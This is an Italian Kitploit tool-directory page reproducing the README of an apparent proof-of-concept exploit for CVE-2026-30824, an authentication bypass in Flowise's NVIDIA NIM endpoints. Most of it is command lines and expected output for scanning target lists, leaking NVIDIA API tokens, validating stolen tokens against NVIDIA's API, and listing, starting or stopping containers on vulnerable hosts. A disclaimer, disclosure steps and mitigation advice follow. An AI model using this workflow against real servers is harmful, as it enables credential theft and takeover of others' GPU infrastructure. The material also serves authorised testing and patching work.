Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication — Un exploit proof-of-concept per **CVE-2026-30824**, una vulnerabilità critica di bypass dell'autenticazione in Flowise che espone gli endpoint API NVIDIA NIM senza autenticazione. | Kitploit
Strumenti/GitHubGitHub/dylvie/cve-2026-30824-flowise-nvidia-nim-authentication
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebTest di Sicurezza delle APIPenetration Testing
GitHubdylvie/cve-2026-30824-flowise-nvidia-nim-authentication

CVE-2026-30824-Flowise-NVIDIA-NIM-Authentication

Un exploit proof-of-concept per **CVE-2026-30824**, una vulnerabilità critica di bypass dell'autenticazione in Flowise che espone gli endpoint API NVIDIA NIM senza autenticazione.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
3 mesi faNon ancora revisionato
Condividi

CVE-2026-30824 — Checker ed Exploit per il Bypass dell'Autenticazione NVIDIA NIM in Flowise

Un checker e exploit proof-of-concept per CVE-2026-30824, una vulnerabilità critica di bypass dell'autenticazione in Flowise che espone gli endpoint API NVIDIA NIM senza autenticazione.

Panoramica della Vulnerabilità

CVE-2026-30824 è un bypass critico dell'autenticazione in Flowise (< 3.0.13) che consente a utenti remoti non autenticati di accedere alla gestione dei container NVIDIA NIM e agli endpoint di generazione dei token API.

CampoValore
Punteggio CVSS9.8 (Critico)
CWECWE-306: Autenticazione Mancante per Funzione Critica
Versioni InteressateFlowise < 3.0.13
ImpattoGestione completa dei container, accesso GPU, furto di token

Causa Principale

Il percorso /api/v1/nvidia-nim/* è nella whitelist del middleware globale di autenticazione, consentendo l'accesso non autenticato a:

  • Generazione e divulgazione di token
  • Gestione dei container (elenco, avvio, arresto)
  • Download di immagini Docker
  • Integrazione API NVIDIA

Funzionalità

✅ Rilevamento della Vulnerabilità — Verifica rapida se il target è vulnerabile
✅ Estrazione dei Token — Divulga i token API NVIDIA dagli endpoint vulnerabili
✅ Validazione dei Token — Verifica i token tramite l'API NVIDIA (dimostra il raggio d'impatto)
✅ Enumerazione dei Container — Elenca i container NIM in esecuzione
✅ Scansione in Lotto — Scansiona più target da un file
✅ Bypass SSL — Ignora i certificati autofirmati per impostazione predefinita
✅ Output Colorato — Indicatori di stato facili da leggere (verde/giallo/rosso)
✅ Ricognizione — Mappatura completa degli endpoint e diagnostica


Installazione

Prerequisiti

  • Python 3.7+
  • Libreria requests

Configurazione

root@kitploit:~
# Clona o scarica lo script
git clone <repository>
cd cve-2026-30824

# Installa le dipendenze
pip install -r requirements.txt
# oppure
pip install requests

Utilizzo

Verifica di Base della Vulnerabilità

root@kitploit:~
# Verifica se un singolo target è vulnerabile
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check

# Output atteso (VULNERABILE):
# [+] Il target risulta VULNERABILE (HTTP 200)
#     Risposta: {...}

Scansione di Più Target

root@kitploit:~
# Crea targets.txt con un URL per riga
cat > targets.txt << EOF
http://192.168.1.100:3000
http://192.168.1.101:3000
http://192.168.1.102:3000
EOF

# Scansiona tutti i target (modalità veloce, senza prompt)
python3 CVE-2026-30824.py -f targets.txt --scan-only

# Output di riepilogo atteso:
# ============================================================
# [*] Riepilogo Scansione
# ============================================================
# [+] VULNERABILI: 2
#     ✓ http://192.168.1.100:3000
#     ✓ http://192.168.1.101:3000
# [-] CORRETTI: 1
#     ✗ http://192.168.1.102:3000

Estrazione del Token API NVIDIA

root@kitploit:~
# Divulga il token API NVIDIA dall'endpoint vulnerabile
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# Output atteso:
# [*] Tentativo di divulgazione del token API NVIDIA...
# [+] Token API NVIDIA: eyJ0eXAiOiJKV1QiLCJhbGc...
# [+] Tipo di Token: Bearer
# [+] Scadenza tra: 3600s

Validazione del Token tramite l'API NVIDIA

root@kitploit:~
# Verifica che un token divulgato funzioni con la vera API NVIDIA
python3 CVE-2026-30824.py --validate-token "eyJ0eXAiOiJKV1QiLCJhbGc..."

# Output atteso:
# [*] Validazione del token tramite l'API NVIDIA...
# [+] Token VALIDO! Accesso a 45 modelli NVIDIA NIM.
#     - mistralai/mistral-7b-instruct-v0.1
#     - meta-llama/llama2-70b
#     - (...)

Elenco dei Container in Esecuzione

root@kitploit:~
# Enumera i container sul target
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --list-containers

# Output atteso:
# [*] Elenco dei container in esecuzione...
# [+] HTTP 200
# [
#   {
#     "id": "abc123xyz",
#     "names": ["flowise_nim"],
#     "image": "nvcr.io/nvidia/nim:latest",
#     "state": "running"
#   }
# ]

Ricognizione Completa (Tutti i Controlli)

root@kitploit:~
# Esegue tutti i controlli di ricognizione sul target vulnerabile
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

Opzioni della Riga di Comando

root@kitploit:~
usage: CVE-2026-30824.py [-h] [-t TARGET] [-f TARGETS_FILE] [--check]
                             [--scan-only] [--get-token]
                             [--validate-token TOKEN] [--list-containers]
                             [--get-container CONTAINER_ID]
                             [--get-image IMAGE_ID] [--pull-image IMAGE_TAG]
                             [--start-container IMAGE_TAG]
                             [--container-name CONTAINER_NAME]
                             [--stop-container CONTAINER_ID] [--preload]
                             [--all] [--timeout TIMEOUT] [--debug]

Argomenti opzionali:
  -h, --help                    Mostra questo messaggio di aiuto ed esci
  -t, --target TARGET           URL del target (es., http://192.168.1.100:3000)
  -f, --targets-file FILE       File con l'elenco dei target (uno per riga)
  
Rilevamento della Vulnerabilità:
  --check                       Verifica solo se il target è vulnerabile
  --scan-only                   Scansiona i target per la vulnerabilità senza prompt
  --debug                       Mostra i dettagli delle richieste e le risposte grezze
  
Sfruttamento:
  --get-token                   Divulga il token API NVIDIA
  --validate-token TOKEN        Valida il token divulgato tramite l'API NVIDIA
  --list-containers             Elenca i container NIM in esecuzione
  --get-container CONTAINER_ID  Ottieni i dettagli del container
  --get-image IMAGE_ID          Ottieni i dettagli dell'immagine
  --pull-image IMAGE_TAG        Scarica un'immagine Docker (es., nvcr.io/nvidia/nim:latest)
  --start-container IMAGE_TAG   Avvia un container da un tag di immagine
  --container-name NAME         Nome per il container avviato
  --stop-container CONTAINER_ID Arresta un container in esecuzione
  --preload                     Attiva l'endpoint di precaricamento delle risorse
  --all                         Esegue tutti i controlli di ricognizione
  
Avanzate:
  --timeout SECONDS             Timeout delle richieste in secondi (predefinito: 15)

Esempi di Flussi di Lavoro

Scenario 1: Valutazione della Rete Interna

root@kitploit:~
# 1. Scansiona l'intera sottorete per istanze vulnerabili
python3 CVE-2026-30824.py -f internal_ips.txt --scan-only

# 2. Per ogni target vulnerabile, estrai il token
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --get-token

# 3. Valida l'impatto del token
python3 CVE-2026-30824.py --validate-token "<token-estratto>"

Scenario 2: Prova dell'Impatto

root@kitploit:~
# Verifica la vulnerabilità e dimostra l'intero raggio d'impatto
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --all

# Questo:
# 1. Verifica la vulnerabilità
# 2. Estrae il token API NVIDIA
# 3. Valida il token tramite l'API NVIDIA
# 4. Elenca i container in esecuzione
# 5. Mostra l'enumerazione delle risorse

Scenario 3: Monitoraggio Continuo

root@kitploit:~
# Monitora un target periodicamente (tramite cron o scheduler)
python3 CVE-2026-30824.py -f monitored_targets.txt --scan-only > scan_$(date +%s).log

Indicatori di Output

Colori

  • 🟢 VERDE — Target vulnerabile o sfruttamento riuscito
  • 🟡 GIALLO — Corretto/non vulnerabile o avviso
  • 🔴 ROSSO — Errore o errore di connessione

Codici di Stato

HTTPSignificato
200✅ Vulnerabile (endpoint accessibile)
400✅ Vulnerabile (errore dell'applicazione ma l'endpoint esiste)

Risoluzione dei Problemi

"Risposta HTML ricevuta invece di JSON"

Problema: L'endpoint restituisce una pagina HTML invece di una risposta API JSON.

Soluzioni:

  1. Verifica che la versione di Flowise sia effettivamente vulnerabile (< 3.0.13)
  2. Controlla se il target esegue effettivamente Flowise (non un'app diversa)
  3. Verifica che il percorso dell'endpoint non sia cambiato in questa versione
  4. Controlla se un proxy inverso o un WAF sta interferendo

"Connessione rifiutata" o "Timeout"

Problema: Impossibile raggiungere il target.

Soluzioni:

root@kitploit:~
# Testa la connettività
curl -v http://192.168.1.100:3000/

# Aumenta il timeout
python3 CVE-2026-30824.py -t http://192.168.1.100:3000 --check --timeout 30

Errore del Certificato SSL

Problema: Il target utilizza un certificato autofirmato o scaduto.

Soluzione: Lo script disabilita la verifica SSL per impostazione predefinita. Se i problemi persistono:

root@kitploit:~
# Aggiungi esplicitamente porta e protocollo
python3 CVE-2026-30824.py -t https://192.168.1.100:3000 --check

La Validazione del Token Fallisce

Problema: Token estratto ma la validazione tramite l'API NVIDIA fallisce.

Cause:

  • Il token potrebbe essere già scaduto
  • Il token potrebbe essere non valido (l'endpoint restituisce un token fittizio)
  • La connettività di rete all'API NVIDIA è bloccata

Considerazioni sulla Sicurezza

⚠️ AVVISO LEGALE

  • Questo strumento è destinato esclusivamente a test di sicurezza autorizzati
  • L'accesso non autorizzato ai sistemi informatici è illegale
  • Testa solo sistemi di tua proprietà o per cui hai esplicita autorizzazione
  • L'autore non si assume alcuna responsabilità per un uso improprio

Divulgazione Responsabile

Se scopri questa vulnerabilità in ambienti reali:

  1. Documenta i risultati
  2. Contatta il team di sicurezza dell'organizzazione
  3. Concedi un tempo ragionevole per la correzione (in genere 90 giorni)
  4. Non divulgare pubblicamente finché non è stata corretta

Mitigazione

Per gli Amministratori di Sistema

Immediate:

  1. Aggiorna Flowise alla versione 3.0.13 o successiva
  2. Implementa controlli di accesso di rete (regole firewall)
  3. Disabilita l'integrazione NVIDIA NIM se non necessaria
  4. Monitora i log API per un uso sospetto dei token

A lungo termine:

  1. Usa regole WAF per bloccare i percorsi /api/v1/nvidia-nim/*
  2. Implementa il rate limiting delle API
  3. Attiva il monitoraggio e gli avvisi di sicurezza
  4. Conduci valutazioni di sicurezza regolari

Per gli Sviluppatori

  • Rivedi tutti i bypass di autenticazione nel codebase
  • Implementa politiche di accesso a negazione predefinita
  • Aggiungi test di sicurezza completi per gli endpoint API
  • Usa la scansione di sicurezza automatizzata in CI/CD

Riferimenti

  • Voce NVD
  • GitHub di Flowise
  • Documentazione NVIDIA NIM
  • CWE-306: Autenticazione Mancante

Licenza

Questo strumento è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati. Consulta il file LICENSE per i dettagli.

Dichiarazione di Esclusione di Responsabilità

Questo exploit è fornito "così com'è" senza garanzia. Usalo solo su sistemi di tua proprietà o per cui hai esplicita autorizzazione scritta. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.


Autore

Creato per test di penetrazione autorizzati e ricerca sulla sicurezza.

Ultimo Aggiornamento: Aprile 2026

Scarica lo strumento
401🟡 Corretto (autenticazione richiesta)
404🟡 Non Flowise o l'endpoint non esiste
5xx🔴 Errore del server/configurazione errata